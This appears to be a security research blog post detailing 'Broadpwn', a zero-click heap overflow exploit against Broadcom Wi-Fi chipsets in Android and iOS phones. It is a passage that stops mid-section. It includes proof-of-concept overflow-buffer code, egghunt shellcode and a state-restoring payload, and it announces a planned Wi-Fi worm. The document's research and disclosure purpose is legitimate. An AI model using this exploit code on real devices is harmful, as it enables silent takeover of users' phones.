Broadpwn: Remotely Compromising Android and iOS via a Bug in Broadcom’s Wi-Fi Chipsets

Author: Nitay Artenstein

Introduction

Fully remote exploits that allow for compromise of a target without any user interaction have become something of a myth in recent years. While some are occasionally still found against insecure and unpatched targets such as routers, various IoT devices or old versions of Windows, practically no remotely exploitable bugs that reliably bypass DEP and ASLR have been found on Android and iOS. In order to compromise these devices, attackers normally resort to browser bugs. The downside of this approach, from an attacker’s perspective, is that successful exploitation requires the victim to either click on an untrusted link or connect to an attacker’s network and actively browse to a non-HTTPS site. Paranoid users will be wary against doing either of these things.

It is naive to assume that a well-funded attacker will accept these limitations. As modern operating systems become hardened, attackers are hard at work looking for new, powerful and inventive attack vectors. However, remote exploits are not a simple matter. Local attacks benefit from an extensive interaction with the targeted platform using interfaces such as syscalls or JavaScript, which allows the attacker to make assumptions about the target’s address space and memory state. Remote attackers, on the other hand, have a much more limited interaction with the target. In order for a remote attack to be successful, the bug on which it is based needs to allow the attacker to make as few assumptions as possible about the target’s state.

This research is an attempt to demonstrate what such an attack, and such a bug, will look like.
Broadpwn is a fully remote attack against Broadcom’s BCM43xx family of WiFi chipsets, which allows for code execution on the main application processor in both Android and iOS. It is based on an unusually powerful 0-day that allowed us to leverage it into a reliable, fully remote exploit.

In this post, we will describe our thought process in choosing an attack surface suitable for developing a fully remote exploit, explain how we honed in on particular code regions in order to look for a bug that can be triggered without user interaction, and walk through the stages of developing this bug into a reliable, fully remote exploit.

We will conclude with a bonus. During the early 2000s, self-propagating malware – or “worms” – were common. But the advent of DEP and ASLR largely killed off remote exploitation, and Conficker (2008) will be remembered as the last self-propagating network worm. We will revive this tradition by turning Broadpwn into the first WiFi worm for mobile devices, and the first public network worm in eight years.

THE ATTACK SURFACE

Two words make up an attacker’s worst nightmare when considering remote exploitation: DEP and ASLR. In order to leverage a bug into a full code execution primitive, some knowledge of the address space is needed. But with ASLR enabled, such knowledge is considerably more difficult to obtain, and sometimes requires a separate infoleak. And, generally speaking, infoleaks are harder to obtain on remote attack surfaces, since the target’s interaction with the attacker is limited. Over the past decade, hundreds of remote bugs have died miserable deaths due to DEP and ASLR.

Security researchers who work with embedded systems don’t have such troubles. Routers, cameras, and various IoT devices typically have no security mitigation enabled. Smartphones are different: Android and iOS have had ASLR enabled from a relatively early stage [a]. But this definition is misleading, since it refers only to code running on the main application processor. A smartphone is a complex system. Which other processors exist in a phone?

Most Android and iOS smartphones have two additional chips which are particularly interesting to us from a remote standpoint: the baseband and the WiFi chipset. The baseband is a fascinating and large attack surface, and it doubtlessly draws the attention of many attackers. However, attacking basebands is a difficult business, mainly due to fragmentation. The baseband market is currently going through a major shift: If, several years ago, Qualcomm were the unchallenged market leaders, today the market has split up into several competitors. Samsung’s Shannon modems are prevalent in most of the newer Samsungs; Intel’s Infineon chips have taken over Qualcomm as the baseband for iPhone 7 and above; and MediaTek’s chips are a popular choice for lower cost Androids. And to top it off, Qualcomm is still dominant in higher end non-Samsung Androids.

WiFi chipsets are a different story: Here, Broadcom are still the dominant choice for most popular smartphones, including most Samsung Galaxy models, Nexus phones and iPhones. A peculiar detail makes the story even more interesting. On laptops and desktop computers, the WiFi chipset generally handles the PHY layer while the kernel driver is responsible for handling layer 3 and above. This is known as a SoftMAC implementation. On mobile devices, however, power considerations often cause the device designers to opt for a FullMAC WiFi implementation, where the WiFi chip is responsible for handling the PHY, MAC and MLME on its own, and hands the kernel driver data packets that are ready to be sent up. Which means, of course, that the chip handles considerable attacker-controlled input on its own.

Another detail sealed our choice. Running some tests on Broadcom’s chips, we realised with joy that there was no ASLR and that the whole of RAM has RWX permissions – meaning that we can read, write and run code anywhere in memory. While the same holds partially true for Shannon and MediaTek basebands, Qualcomm basebands do support DEP and are therefore somewhat harder to exploit.

Before we continue, it should be mentioned that a considerable drawback exists when attacking the WiFi chip. The amount of code running on WiFi chipsets is considerably smaller than code running on basebands, and the 802.11 family of protocols is significantly less complicated to implement than the nightmarish range of protocols that basebands have to implement, including GSM and LTE. On a BCM4359 WiFi SoC, we identified approximately 9,000 functions. On a Shannon baseband, there are above 80,000. That means that a reasonably determined effort at code auditing on Broadcom’s part has a good chance of closing off many exploitable bugs, making an attacker’s life much harder. Samsung would need to put in considerably more effort to arrive at the same result.

THE BCM43XX FAMILY [b]

Broadcom’s WiFi chips are the dominant choice for the WiFi slot in high-end smartphones. In a non-exhaustive research, we’ve found that the following models use Broadcom WiFi chips:

  • Samsung Galaxy from S3 through S8, inclusive
  • All Samsung Notes3. Nexus 5, 6, 6X and 6P
  • All iPhones after iPhone 5

The chip model range from BCM4339 for the oldest phones (notably Nexus 5) up to BCM4361 for the Samsung Galaxy S8. This research was carried out on both a Samsung Galaxy S5 (BCM4354) and a Samsung Galaxy S7 (BCM4359), with the main exploit development process taking place on the S7.

Reverse engineering and debugging the chip’s firmware is made relatively simple by the fact that the unencrypted firmware binary is loaded into the chip’s RAM by the main OS every time after the chip is reset, so a simple search through the phone’s system will usually suffice to locate the Broadcom firmware. On Linux kernels, its path is usually defined in the config variable BCMDHD_FW_PATH.

Another blessing is that there is no integrity check on the firmware, so it’s quite easy to patch the original firmware, add hooks that print debugging output or otherwise modify its behaviour, and modify the kernel to load our firmware instead. A lot of this research was carried out by placing hooks at the right places and observing the system’s behaviour (and more interestingly, its misbehaviour).

All the BCM chips that we’ve observed run an ARM Cortex-R4 microcontroller. One of the system’s main quirks is that a large part of the code runs on the ROM, whose size is 900k. Patches, and additional functionality, are added to the RAM, also 900k in size. In order to facilitate patching, an extensive thunk table is used in RAM, and calls are made into that table at specific points during execution. Should a bug fix be issued, the thunk table could be changed to redirect to the newer code.

In terms of architecture, it would be correct to look at the BCM43xx as a WiFi SoC, since two different chips handle packet processing. While the main processor, the Cortex-R4, handles the MAC and MLME layers before handing the received packets to the Linux kernel, a separate chip, using a proprietary Broadcom processor architecture, handles the 802.11 PHY layer. Another component of the SoC is the interface to the application processor: Older BCM chips used the slower SDIO connection, while BCM4358 and above use PCIe.


The main ARM microcontroller in the WiFi SoC runs a mysterious proprietary RTOS known as HNDRTE. While HNDRTE is closed-source, there are several convenient places to obtain older versions of the source code. Previous researchers have mentioned the Linux brcmsmac driver, a driver for SoftMAC WiFi chips which handle only the PHY layer while letting the kernel do the rest. While this driver does contain source code which is also common to HNDRTE itself, we found that that most of the driver code which handles packet processing (and that’s where we intended to find bugs) was significantly different to the one found in the firmware, and therefore did not help us with reversing the interesting code areas.

The most convenient resource we found was the source code for the VMG-1312, a forgotten router which also uses a Broadcom chipset. While the brcmsmac driver contains code which was open-sourced by Broadcom for use with Linux, the VMG-1312 contains proprietary Broadcom closed-source code, bearing the warning “This is UNPUBLISHED PROPRIETARY SOURCE CODE of Broadcom Corporation”. Apparently, the Broadcom code was published by mistake together with the rest of the VMG-1312 sources.

The leaked code contains most of the key functions we find in the firmware blob, but it appears to be dated, and does not contain much of the processing code for the newer 802.11 protocols. Yet it was extremely useful during the course of this research, since the main packet handling functions have not changed much. By comparing the source code with the firmware, we were able to get a quick high-level view of the packet processing code section, which enabled us to hone in on interesting code areas and focus on the next stage: finding a suitable bug.

FINDING THE RIGHT BUG

By far, the biggest challenge in developing a fully remote attack is finding a suitable bug. In order to be useful, the right bug will need to meet all the following requirements:

  • It will be triggered without requiring interaction on behalf of the victim
  • It will not require us to make assumptions about the state of the system, since our ability to leak information is limited in a remote attack
  • After successful exploitation, the bug will not leave the system in an unstable state

Finding a bug that can be triggered without user interaction is a tall order. For example, CVE-2017-0561, which is a heap-overflow in Broadcom’s TDLS implementation discovered by Project Zero, still requires the attacker and the victim to be on the same WPA2 network. This means the attackers either need to trick the victim to connect to a WPA2 network that they control, or be able to connect to a legitimate WPA2 network which the victim is already on.

So where can we find a more suitable bug? To answer that question, let’s look briefly at the 802.11 association process. The process begins with the client, called mobile station (STA) in 802.11 lingo, sending out Probe Request packets to look for nearby Access Points (APs) to connect to. The Probe Requests contain data rates supported by the STA, as well as 802.11 capabilities such as 802.11n or 802.11ac. They will also normally contain a list of preferred SSIDs that the STA has previously connected to.

In the next phase, an AP that supports the advertised data rates will send a Probe Response containing data such as supported encryption types and 802.11 capabilities of the AP. After that, the STA and the AP will both send out Authentication Open Sequence packets, which are an obsolete leftover from the days WLAN networks were secured by WEP. In the last phase of the association process, a STA will send an Association Request to the AP it has chosen to connect to. This packet will include the chosen encryption type, as well as various other data about the STA.

All the packet types in the above association sequence have the same structure: A basic 802.11 header, followed by a series of 802.11 Information Elements (IEs). The IEs are encoded using the well known TLV (Type-Length-Value) convention, with the first byte of the IE denoting the type of information, the second byte holding its length, and the next bytes hold the actual data. By parsing this data, both the AP and the STA get information about the requirements and capabilities of their counterpart in the association sequence.

Any actual authentication, implemented using protocols such as WPA2, happens only after this association sequence. Since there are no real elements of authentication within the association sequence, it’s possible to impersonate any AP using its MAC address and SSID. The STA will only be able to know that the AP is fake during the later authentication phase. This makes any bug during the association sequence especially valuable. An attacker who finds a bug in the association process will be able to sniff the victim’s probe requests over the air, impersonate an AP that the STA is looking for, then trigger the bug without going through any authentication.

When looking for the bug, we were assisted by the highly modular way in which Broadcom’s code handles the different protocols in the 802.11 family and the different functionalities of the firmware itself. The main relevant function in this case is wlc_attach_module, which abstracts each different protocol or functionality as a separate module. The names of the various initialization functions that wlc_attach_module calls are highly indicative. This is some sample code:

prot_g = wlc_prot_g_attach(wlc);
wlc->prot_g = prot_g;
if (!prot_g) {
  goto fail;
}
prot_n = wlc_prot_n_attach(wlc);
wlc->prot_n = prot_n;
if (!prot_n) {
  goto fail;
}
ccx = wlc_ccx_attach(wlc);
wlc->ccx = ccx;
if (!ccx) { 
  goto fail;
}
amsdu = wlc_amsdu_attach(wlc);
wlc->amsdu = amsdu;
if (!amsdu) {
  goto fail;
}

Each module initialization function then installs handlers which are called whenever a packet is received or generated. These callbacks are responsible for either parsing the contexts of a received packet which are relevant for a specific protocol, or generating the protocol-relevant data for an outgoing packet. We’re mostly interested in the latter, since this is the code which parses attacker-controlled data, so the relevant function here is wlc_iem_add_parse_fn, which has the following prototype:

 void wlc_iem_add_parse_fn(iem_info *iem, uint32 subtype_bitfield,
                           uint32 iem_type, callback_fn_t fn, void *arg)

The second and third arguments are particularly relevant here. subtype_bitfield is a bitfield containing the different packet subtypes (such as probe request, probe response, association request etc.) that the parser is relevant for. The third argument, iem_type, contains the IE type (covered earlier) that this parser is relevant for.

wlc_iem_add_parse_fn is called by the various module initialization functions in wlc_module_attach. By writing some code to parse the arguments passed to it, we can make a list of the parsers being called for each phase of the association sequence. By narrowing our search down to this list, we can avoid looking for bugs in areas of the code which don’t interest us: areas which occur only after the user has completed the full association and authentication process with an AP. Any bug that we might find in those areas will fail to meet our most important criteria – the ability to be triggered without user interaction.

Using the approach above, we became lucky quite soon. In fact, it took us time to realise how lucky.

THE BUG

Wireless Multimedia Extensions (WMM) are a Quality-of-Service (QoS) extension to the 802.11 standard, enabling the Access Point to prioritize traffic according to different Access Categories (ACs), such as voice, video or best effort. WMM is used, for instance, to insure optimal QoS for especially data-hungry applications such as VoIP or video streaming. During a client’s association process with an AP, the STA and AP both announce their WMM support level in an Information Element (IE) appended to the end of the Beacon, Probe Request, Probe Response, Association Request and Association Response packets.

In our search for bugs in functions that parse association packets after being installed by wlc_iem_add_parse_fn, we stumbled upon the following function:

void wlc_bss_parse_wme_ie(wlc_info *wlc, ie_parser_arg *arg) {
  unsigned int frame_type;  
  wlc_bsscfg *cfg;  
  bcm_tlv *ie;  
  unsigned char *current_wmm_ie;  
  int flags;
  frame_type = arg->frame_type;  
  cfg = arg->bsscfg;  
  ie = arg->ie;  
  current_wmm_ie = cfg->current_wmm_ie;  
  if ( frame_type == FC_REASSOC_REQ ) {    
    ...    
    <handle reassociation requests>    
    ...  }  
  if ( frame_type == FC_ASSOC_RESP ) {    
    ...    
    if ( wlc->pub->_wme ) {      
      if ( !(flags & 2) ) {        
        ...        
        if ( ie ) {          
          ...          
          cfg->flags |= 0x100u;          
          memcpy(current_wmm_ie, ie->data, ie->len);

 

In a classic bug, the program calls memcpy() in the last line without verifying that the buffer current_wmm_ie (our name) is large enough to hold the data of size ie->len. But it’s too early to call it a bug: let’s see where current_wmm_ie is allocated to figure out whether it really is possible to overflow. We can find the answer in the function which allocates the overflowed structure:

wlc_bsscfg *wlc_bsscfg_malloc(wlc_info *wlc) {  
  wlc_info *wlc;  
  wlc_bss_info *current_bss;  
  wlc_bss_info *target_bss;  
  wlc_pm_st *pm;  
  wmm_ie *current_wmm_ie;
  ...  
  current_bss = wlc_calloc(0x124);  
  wlc->current_bss = current_bss;  
  if ( !current_bss ) {    
    goto fail;  }  
  target_bss = wlc_calloc(0x124);  
  wlc->target_bss = target_bss;  
  if ( !target_bss ) {    
    goto fail;  }  
  pm = wlc_calloc(0x78);  
  wlc->pm = pm;  
  if ( !pm ) {    
    goto fail;  }  
  current_wmm_ie = wlc_calloc(0x2C);  
  wlc->current_wmm_ie = current_wmm_ie;  
  if ( !current_wmm_ie ) {    
    goto fail;  }

As we can see in the last section, the current_wmm_ie buffer is allocated with a length of 0x2c (44) bytes, while the maximum size for an IE is 0xff (255) bytes. This means that we have a nice maximum overflow of 211 bytes.

But an overflow would not necessarily get us very far. For example, CVE-2017-0561 (the TDLS bug) is hard to exploit because it only allows the attacker to overflow the size field of the next heap chunk, requiring complicated heap acrobatics in order to get a write primitive, all the while corrupting the state of the heap and making execution restoration more difficult. As far as we know, this bug could land us in the same bad situation. So let’s understand what exactly is being overflowed here.

Given that the HNDRTE implementation of malloc() allocates chunks from the top of memory to the bottom, we can assume, by looking at the above code, that the wlc->pm struct will be allocated immediately following the wlc->current_wmm_ie struct which is the target of the overflow. To validate this assumption, let’s look at a hex dump of current_wmm_ie, which on the BCM4359 that we tested was always allocated at 0x1e7dfc:

00000000: 00 50 f2 02 01 01 00 00 03 a4 00 00 27 a4 00 00  .P..........'...
00000010: 42 43 5e 00 62 32 2f 00 00 00 00 00 00 00 00 00  BC^.b2/.........
00000020: c0 0b e0 05 0f 00 00 01 00 00 00 00 7a 00 00 00  ............z...
00000030: 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000040: 64 7a 1e 00 00 00 00 00 b4 7a 1e 00 00 00 00 00  dz.......z......
00000050: 00 00 00 00 00 00 00 00 c8 00 00 00 c8 00 00 00  ................
00000060: 00 00 00 00 00 00 00 00 9c 81 1e 00 1c 81 1e 00  ................
00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000a0: 00 00 00 00 00 00 00 00 2a 01 00 00 00 c0 ca 84  ........*.......
000000b0: ba b9 06 01 0d 62 72 6f 61 64 70 77 6e 5f 74 65  .....broadpwn_te
000000c0: 73 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00  st..............
000000d0: 00 00 00 00 00 00 fb ff 23 00 0f 00 00 00 01 10  ........#.......
000000e0: 01 00 00 00 0c 00 00 00 82 84 8b 0c 12 96 18 24  ...............$
000000f0: 30 48 60 6c 00 00 00 00 00 00 00 00 00 00 00 00  0H`l............

Looking at offset 0x2c, which is the end of current_wmm_ie, we can see the size of the next heap chunk, 0x7a – which is the exact size of the wlc->pm struct plus a two byte alignment. This validates our assumption, and means that our overflow always runs into wlc->pm, which is a struct of type wlc_pm_st.

It’s worthwhile to note that the position of both current_wmm_ie and pm is completely deterministic given a firmware version. Since these structures are allocated early in the initialization process, they will always be positioned at the same addresses. This fortunately spares us the need for complicated heap feng-shui – we always overflow into the same address and the same structure.

THE EXPLOIT

Finding a bug was the easy part. Writing a reliable remote exploit is the hard part, and this is usually where a bug is found to be either unexploitable or so difficult to exploit as to be impractical.

In our view, the main difficulty in writing a remote exploit is that some knowledge is needed about the address space of the attacked program. The other difficulty is that mistakes are often unforgivable: in a kernel remote exploit, for instance, any misstep will result in a kernel panic, immediately alerting the victim that something is wrong – especially if the crash is repeated several times.

In Broadpwn, both of these difficulties are mitigated by two main lucky facts: First, the addresses of all the relevant structures and data that we will use during the exploit are consistent for a given firmware build, meaning that we do not need any knowledge of dynamic addresses – after testing the exploit once on a given firmware build, it will be consistently reproducible. Second, crashing the chip is not particularly noisy. The main indication in the user interface is the disappearance of the WiFi icon, and a temporary disruption of connectivity as the chip resets.

This creates a situation where it’s possible to build a dictionary of addresses for a given firmware, then repeatedly launch the exploit until we have brute forced the correct set of addresses. A different, experimental solution, which does not require knowledge of any version-specific addresses, is given at the end of this section.

Let’s first look at how we achieve a write primitive. The overflowed structure is of type wlc_pm_st, and handles power management states, including entering and leaving power-saving mode. The struct is defined as follows:

typedef struct wlc_pm_st { 
  uint8 PM; bool PM_override; 
  mbool PMenabledModuleId; 
  bool PMenabled; 
  bool PMawakebcn; 
  bool PMpending; 
  bool priorPMstate; 
  bool PSpoll; 
  bool check_for_unaligned_tbtt; 
  uint16 pspoll_prd; 
  struct wl_timer *pspoll_timer; 
  uint16 apsd_trigger_timeout; 
  struct wl_timer *apsd_trigger_timer; 
  bool apsd_sta_usp; 
  bool WME_PM_blocked; 
  uint16 pm2_rcv_percent; 
  pm2rd_state_t pm2_rcv_state; 
  uint16 pm2_rcv_time; 
  uint pm2_sleep_ret_time; 
  uint pm2_sleep_ret_time_left;  
  uint pm2_last_wake_time; 
  bool pm2_refresh_badiv; 
  bool adv_ps_poll; 
  bool send_pspoll_after_tx;    
  wlc_hwtimer_to_t *pm2_rcv_timer;  
  wlc_hwtimer_to_t *pm2_ret_timer; 
} wlc_pm_st_t;

Four members of this struct are especially interesting to control from an exploitation viewpoint: pspoll_timer and apsd_trigger_timer of type wl_timer, and pm2_rcv_timer and pm2_ret_timer of type wlc_hwtimer_to_t. First let’s look at the latter.

typedef struct _wlc_hwtimer_to { 
  struct _wlc_hwtimer_to *next; 
  uint timeout; hwtto_fn fun; 
  void *arg; bool expired;
} wlc_hwtimer_to_t;

The function wlc_hwtimer_del_timeout is called after processing the packet and triggering the overflow, and receives pm2_ret_timer as an argument:

void wlc_hwtimer_del_timeout(wlc_hwtimer_to *newto) {  
  wlc_hwtimer_to *i;  
  wlc_hwtimer_to *next;   
  wlc_hwtimer_to *this;
  for ( i = &newto->gptimer->timer_list; ; i = i->next )  {    
    this = i->next;    
    if ( !i->next ) {      
      break; }    
    if ( this == newto ) {      
      next = newto->next;      
      if ( newto->next ) {        
        next->timeout += newto->timeout; // write-4 primitive   
      }      
      i->next = next;      
      this->fun = 0;      
      return;    
    }  
  }
}

As can be seen from the code, by overwriting the value of newto and causing it to point to an attacker controlled location, the contents of the memory location pointed to by next->timeout can be incremented by the memory contents of newto->timeout. This amounts to a write-what-where primitive, with the limitation that the original contents of the overwritten memory location must be known.

A less limited write primitive can be achieved through using the pspoll_timer member, of type struct wl_timer. This struct is handled by a callback function triggered regularly during the association process :

int timer_func(struct wl_timer *t) {  
  prev_cpsr = j_disable_irqs();  
  v3 = t->field_20;    
  ...
  if ( v3 ) {    
    v7 = t->field_18;    
    v8 = &t->field_8;    
    if ( &t->field_8 == v7 ) {
      ... 
    } else {      
      v9 = t->field_1c;      
      v7->field_14 = v9;      
      *(v9 + 16) = v7;      
      if ( *v3 == v8 ) {        
        v7->field_18 = v3; 
      }    
    }    
    t->field_20 = 0;  
  }  
  j_restore_cpsr(prev_cpsr);  
  return 0;
}

As can be seen towards the end of the function, we have a much more convenient write primitive here. Effectively, we can write the value we store in field_1c into an address we store in field_18. With this, we can write an arbitrary value into any memory address, without the limitations of the previous write primitive we found.

The next question is how to leverage our write primitive into full code execution. For this, two approaches will be considered: one which requires us to know firmware memory addresses in advance (or to brute force those addresses by crashing the chip several times), and another method, more difficult to implement, which requires a minimum of that knowledge. We’ll look at the former approach first.
To achieve a write primitive, we need to overwrite pspoll_timer with a memory address that we control. Since the addresses of both wlc->current_wmm_ie and wlc->ps are known and consistent for a given firmware build, and since we can fully overwrite their contents, we can clobber pspoll_timer to point anywhere within these objects. For the creation of a fake wl_timer object, the unused area between wlc->current_wmm_ie and wlc->ps is an ideal fit. Placing our fake timer object there, we’ll cause field_18 to point to an address we want to overwrite (minus an offset of 14) and have field_1c hold the contents we want to overwrite that memory with. After we trigger the overwrite, we only need to wait for the timer function to be called, and do our overwrite for us.

The next stage is to determine which memory address do we want to overwrite. As can be seen in the above function, immediately after we trigger our overwrite, a call to j_restore_cpsr is made. This function basically does one thing: it refers to the function thunk table found in RAM (mentioned previously when we described HNDRTE and the BCM43xx architecture), pulls the address of restore_cpsr from the thunk table, and jumps to it. Therefore, by overwriting the index of restore_cpsr in the thunk table, we can cause our own function to be called immediately afterwards. This has the advantage of being portable, since both the starting address of the thunk table and the index of the pointer to restore_cpsr within it are consistent between firmware builds.

We have now obtained control of the instruction pointer and have a fully controlled jump to an arbitrary memory address. This is made sweeter by the fact that there are no restrictions on memory permissions – the entire RAM memory is RWX, meaning we can execute code from the heap, the stack or wherever else we choose. But we still face a problem: finding a good location to place our shellcode is an issue. We can write the shellcode to the wlc->pm struct that we are overflowing, but this poses two difficulties: first, our space is limited by the fact that we only have an overwrite of 211 bytes. Second, the wlc->pm struct is constantly in use by other parts of the HNDRTE code, so placing our shellcode at the wrong place within the structure will cause the whole system to crash.

After some trial and error, we realized that we had a tiny amount of space for our code: 12 bytes within the wlc->pm struct (the only place where overwriting data in the struct would not crash the system), and 32 bytes in an adjacent struct which held an SSID string (which we could freely overwrite). 44 bytes of code are not a particularly useful payload – we’ll need to find somewhere else to store our main payload.
The normal way to solve such a problem in exploits is to look for a spray primitive: we’ll need a way to write the contents of large chunks of memory, giving us a convenient and predictable location to store our payload.

While spray primitives can be an issue in remote exploits, since sometimes the remote code doesn’t give us a sufficient interface to write large chunks of memory, in this case it was easier than expected – in fact, we didn’t even need to go through the code to look for suitable allocation primitives. We just had to use common sense.

Any WiFi implementation will need to handle many packets at any given time. For this, HNDRTE provides the implementation of a ring buffer common to the D11 chip and the main microcontroller. Packets arriving over PHY are repeatedly written to this buffer until it gets filled, and which point new packets are simply written to the beginning of the buffer and overwrite any existing data there.

For us, this means that all we need to do is broadcast our payload over the air and over multiple channels. As the WiFi chip repeatedly scans for available APs (this is done every few seconds even when the chip is in power saving mode), the ring buffer gets filled with our payload – giving us the perfect place to jump to and enough space to store a reasonably sized payload.

What we’ll do, therefore, is this: write a small stub of shellcode within wlc->pm, which saves the stack frame (so we can restore normal execution afterwards) and jumps to the next 32 bytes of shellcode which we store in the unused SSID string. This compact shellcode is nothing else than classic egghunting shellcode, which searches the ring buffer for a magic number which indicates the beginning of our payload, then jumps to it.

 

So, time to look at the POC code. This is how the exploit buffer is crafted:

u8 *generate_wmm_exploit_buf(u8 *eid, u8 *pos) {  
  uint32_t curr_len = (uint32_t) (pos - eid);  
  uint32_t overflow_size = sizeof(struct exploit_buf_4359);  
  uint32_t p_patch = 0x16010C; // p_restore_cpsr  
  uint32_t buf_base_4359 = 0x1e7e02;  
  struct exploit_buf_4359 *buf = (struct exploit_buf_4359 *) pos;
  memset(pos, 0x0, overflow_size);
  memcpy(&buf->pm_st_field_40_shellcode_start_106, shellcode_start_bin, sizeof(shellcode_start_bin)); // Shellcode thunk  
  buf->ssid.ssid[0] = 0x41;  
  buf->ssid.ssid[1] = 0x41;  
  buf->ssid.ssid[2] = 0x41;  
  memcpy(&buf->ssid.ssid[3], egghunt_bin, sizeof(egghunt_bin));  
  buf->ssid.size = sizeof(egghunt_bin) + 3;
  buf->pm_st_field_10_pspoll_timer_58 = buf_base_4359 + offsetof(struct exploit_buf_4359, t_field_0_2); // Point pspoll timer to our fake timer object
  buf->pm_st_size_38 = 0x7a;  
  buf->pm_st_field_18_apsd_trigger_timer_66 = 0x1e7ab4;  
  buf->pm_st_field_28_82 = 0xc8;  
  buf->pm_st_field_2c_86 = 0xc8;  
  buf->pm_st_field_38_pm2_rcv_timer_98 = 0x1e819c;  
  buf->pm_st_field_3c_pm2_ret_timer_102 = 0x1e811c;  
  buf->pm_st_field_78_size_162 = 0x1a2;  
  buf->bss_info_field_0_mac1_166 = 0x84cac000;  
  buf->bss_info_field_4_mac2_170 = 0x106b9ba;
  buf->t_field_20_34 = 0x200000;  
  buf->t_field_18_26 = p_patch - 0x14; // Point field_18 to the restore_cpsr thunk  
  buf->t_field_1c_30 = buf_base_4359 + offsetof(struct exploit_buf_4359, pm_st_field_40_shellcode_start_106) + 1; // Write our shellcode address to the thunk
  curr_len += overflow_size;  pos += overflow_size;
  return pos;
}

struct shellcode_ssid {  
  unsigned char size;  
  unsigned char ssid[31];
} STRUCT_PACKED;
 
struct exploit_buf_4359 {  
  uint16_t stub_0;  
  uint32_t t_field_0_2;  
  uint32_t t_field_4_6;  
  uint32_t t_field_8_10;  
  uint32_t t_field_c_14;  
  uint32_t t_field_10_18;  
  uint32_t t_field_14_22;  
  uint32_t t_field_18_26;  
  uint32_t t_field_1c_30;  
  uint32_t t_field_20_34;  
  uint32_t pm_st_size_38;  
  uint32_t pm_st_field_0_42;  
  uint32_t pm_st_field_4_46;  
  uint32_t pm_st_field_8_50;  
  uint32_t pm_st_field_c_54;  
  uint32_t pm_st_field_10_pspoll_timer_58;  
  uint32_t pm_st_field_14_62;  
  uint32_t pm_st_field_18_apsd_trigger_timer_66;  
  uint32_t pm_st_field_1c_70;  
  uint32_t pm_st_field_20_74;  
  uint32_t pm_st_field_24_78;  
  uint32_t pm_st_field_28_82;  
  uint32_t pm_st_field_2c_86;  
  uint32_t pm_st_field_30_90;  
  uint32_t pm_st_field_34_94;  
  uint32_t pm_st_field_38_pm2_rcv_timer_98;  
  uint32_t pm_st_field_3c_pm2_ret_timer_102;  
  uint32_t pm_st_field_40_shellcode_start_106;  
  uint32_t pm_st_field_44_110;  
  uint32_t pm_st_field_48_114;  
  uint32_t pm_st_field_4c_118;  
  uint32_t pm_st_field_50_122;  
  uint32_t pm_st_field_54_126;  
  uint32_t pm_st_field_58_130;  
  uint32_t pm_st_field_5c_134;  
  uint32_t pm_st_field_60_egghunt_138;  
  uint32_t pm_st_field_64_142;  
  uint32_t pm_st_field_68_146; // <- End  
  uint32_t pm_st_field_6c_150;  
  uint32_t pm_st_field_70_154;  
  uint32_t pm_st_field_74_158;  
  uint32_t pm_st_field_78_size_162;  
  uint32_t bss_info_field_0_mac1_166;  
  uint32_t bss_info_field_4_mac2_170;  
  struct shellcode_ssid ssid;
} STRUCT_PACKED;

And this is the shellcode which carries out the egghunt:

__attribute__((naked)) voidshellcode_start(void) {  
  asm("push {r0-r3,lr}\n"           
      "bl egghunt\n"            
      "pop {r0-r3,pc}\n");
}

void egghunt(unsigned int cpsr) {  
  unsigned int egghunt_start = RING_BUFFER_START;  
  unsigned int *p = (unsigned int *) egghunt_start;  
  void (*f)(unsigned int);
  loop:  
  p++;  
  if (*p != 0xc0deba5e)    
    goto loop;  
  f = (void (*)(unsigned int))(((unsigned char *) p) + 5);  
  f(cpsr);  
  return;
}

So we have a jump to our payload, but is that all we need to do? Remember that we have seriously corrupted the wlc->pm object, and the system will not remain stable for long if we leave it that way. Also recall that one of our main objectives is to avoid crashing the system – an exploit which gives an attacker transient control is of limited value.

Therefore, before any further action, our payload needs to restore the wlc->pm object to its normal condition. Since all addresses in this object are consistent for a given firmware build, we can just copy these values back into the buffer and restore the object to a healthy state.

Here’s an example for what an initial payload will look like:

unsigned char overflow_orig[] = {    
  0x00, 0x00, 0x03, 0xA4, 0x00, 0x00, 0x27, 0xA4, 
  0x00, 0x00, 0x42, 0x43, 0x5E, 0x00, 0x62, 0x32,    
  0x2F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xC0, 0x0B, 0xE0, 0x05, 0x0F, 0x00,    
  0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x7A, 0x00, 
  0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,    
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x64, 0x7A, 0x1E, 0x00, 0x00, 0x00,    
  0x00, 0x00, 0xB4, 0x7A, 0x1E, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,    
  0x00, 0x00, 0xC8, 0x00, 0x00, 0x00, 0xC8, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,    
  0x00, 0x00, 0x9C, 0x81, 0x1E, 0x00, 0x1C, 0x81, 
  0x1E, 0x00 
};

void entry(unsigned int cpsr) {    
  int i = 0;    
  unsigned int *p_restore_cpsr = (unsigned int *) 0x16010C;
  *p_restore_cpsr = (unsigned int) restore_cpsr;
  printf("Payload triggered, restoring CPSR\n");
  restore_cpsr(cpsr);
  printf("Restoring contents of wlc->pm struct\n");
  memcpy((void *) (0x1e7e02), overflow_orig, sizeof(overflow_orig));    
  return;
}

At this stage, we have achieved our first and most important mission: we have reliable, consistent RCE against the BCM chip, and our control of the system is not transient – the chip does not crash following the exploit. At this point, the only way we will lose control of the chip is if the user turns off WiFi or if the chip crashes.

THE EXPLOIT – SECOND APPROACH

As we mentioned, there is still a problem with the above approach. For each firmware build, we’ll need to determine the correct memory addresses to be used in the exploit. And while those addresses are guaranteed to be consistent for a given build, we should still look for a way to avoid the hard work of compiling address tables for each firmware version.

The main problem is that we need a predictable memory address whose contents we control, so we can overwrite the pspoll_timer pointer and redirect it to our fake timer object. The previous approach relied on the fact that the address of wlc->pm is consistent for a given firmware build. But there’s another buffer whose address we already know: the ring buffer. And in this case, there’s an added advantage: its beginning address seems to be the same across the board for a specific chip type, regardless of build or version number.

